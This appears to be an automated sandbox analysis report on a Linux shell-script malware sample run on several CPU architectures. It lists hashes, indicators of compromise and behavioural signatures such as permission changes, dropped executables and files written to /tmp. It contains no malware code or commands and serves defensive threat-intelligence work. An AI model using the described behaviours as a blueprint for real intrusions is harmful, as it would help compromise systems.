Analysis
-
max time kernel
79s -
max time network
81s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipsel image:debian9-mipsel-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
21/10/2024, 01:37
Static task
static1
Behavioral task
behavioral1
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
-
Size
10KB
-
MD5
d02d2cc45f453ae469915bf5bfcf48ec
-
SHA1
5db9569732492cb7f0762973db3950e0cbbff9d8
-
SHA256
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1
-
SHA512
e6f62639d7a9ed67f76e803004282c82162e299db70a632e144b81ac07192254c5e424f5bc32b5267f608d7b11c7692c55098a8f3d0dd4fe69efa61d22430f3b
-
SSDEEP
96:rb5p07Lo4jxniybeVFX5Xe4WVykrlkz9Cb5O:rb5y7Lo4jp+Fwb5O
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh PID:705
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97